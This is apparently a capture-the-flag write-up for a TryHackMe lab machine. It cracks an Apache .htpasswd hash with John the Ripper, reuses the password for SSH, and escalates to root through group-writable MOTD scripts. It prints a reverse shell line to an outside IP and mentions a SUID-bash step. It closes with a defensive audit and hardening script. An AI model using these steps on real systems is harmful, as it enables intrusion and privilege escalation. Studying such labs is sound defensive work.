With `cat .htpasswd` we can find a user hash for Apache: `james:$apr1$zPZMix2A$d8fBXH0em33bfI9UTt9Nq1`.
It may be worth cracking in case the password is reused for SSH.
```
$ john --wordlist=/usr/share/wordlists/passwords/rockyou.txt --format=md5crypt-long hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt-long, crypt(3) $1$ (and variants) [MD5 32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
j<edited>a         (james)
1g 0:00:00:00 DONE (2021-07-27 16:59) 50.00g/s 32000p/s 32000c/s 32000C/s evelyn..pebbles
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```

```
$ ssh firstname.lastname@example.org
The authenticity of host 'debug.thm (10.10.146.9)' can't be established.
ED25519 key fingerprint is SHA256:j1rsa6H3aWAH+1ivgTwsdNPBDEJU72p3MUWbcL70JII.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'debug.thm' (ED25519) to the list of known hosts.
email@example.com's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-45-generic x86_64)
```
As you may already know, we are soon planning to submit this machine to THM's CyberSecurity Platform! Crazy... Isn't it?
But there's still one thing I'd like you to do, before the submission.
Could you please make our ssh welcome message a bit more pretty... you know... something beautiful :D
I gave you access to modify all these files :)
Oh and one last thing... You gotta hurry up! We don't have much time left until the submission!
The login banner hints at the next step: we have write permission on every MOTD script:

```
james@osboxes:~$ ls -lhA /etc/update-motd.d/
total 28K
-rwxrwxr-x 1 root james 1.2K Mar 10 18:32 00-header
-rwxrwxr-x 1 root james    0 Mar 10 18:38 00-header.save
-rwxrwxr-x 1 root james 1.2K Jun 14  2016 10-help-text
-rwxrwxr-x 1 root james   97 Dec  7  2018 90-updates-available
-rwxrwxr-x 1 root james  299 Jul 22  2016 91-release-upgrade
-rwxrwxr-x 1 root james  142 Dec  7  2018 98-fsck-at-reboot
-rwxrwxr-x 1 root james  144 Dec  7  2018 98-reboot-required
-rwxrwxr-x 1 root james  604 Nov  5  2017 99-esm
```
The scripts in `/etc/update-motd.d/` are run by root (via `pam_motd`) to build the login message, so anything appended to one of them (e.g. `00-header`), such as a reverse shell (`/bin/bash -i >& /dev/tcp/10.9.19.77/9001 0>&1`), is executed with root privileges the next time any user logs in over SSH. The group write bit granted to `james` is the whole vulnerability.
It wasn't working with reverse shells, so I made bash SUID instead.
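The root cause above is a permission misconfiguration, so the useful check on the defending side is an audit of the MOTD directory for scripts that a non-root user can modify, plus the corresponding fix. The helper below is an added example, not part of the original write-up; the function names `audit_motd_dir` and `harden_motd_dir` are my own, and the directory defaults to `/etc/update-motd.d` but can be pointed anywhere for testing.

```shell
#!/bin/sh
# Added example (not from the write-up): audit and harden a MOTD script directory.
# Every file here is executed by root at login, so group- or world-writable
# entries are a direct privilege-escalation path for whoever holds that bit.

# Print each regular file under $1 (default /etc/update-motd.d) whose mode has
# the group-write or other-write bit set. Ownership is not checked here, only
# mode bits, so the result does not depend on who runs the audit.
audit_motd_dir() {
    dir="${1:-/etc/update-motd.d}"
    find "$dir" -type f \( -perm -g=w -o -perm -o=w \) 2>/dev/null | sort
}

# Return 0 when the directory is clean, 1 when at least one writable script exists.
motd_dir_is_clean() {
    [ -z "$(audit_motd_dir "$1")" ]
}

# Remediation: strip group/other write bits from every script in the directory.
# On a real host you would also chown the files back to root:root; that needs
# root and is left out so the example runs unprivileged on a test directory.
harden_motd_dir() {
    dir="${1:-/etc/update-motd.d}"
    find "$dir" -type f -exec chmod g-w,o-w {} +
}

# Usage (run as a normal user against the real directory for a read-only check):
#   . ./motd_audit.sh && audit_motd_dir
```

Run against the listing shown on this machine, the audit would report all eight scripts, since each is mode `-rwxrwxr-x` with group `james`; after `harden_motd_dir` (and `chown root:root`), `james` can no longer influence what root executes at login.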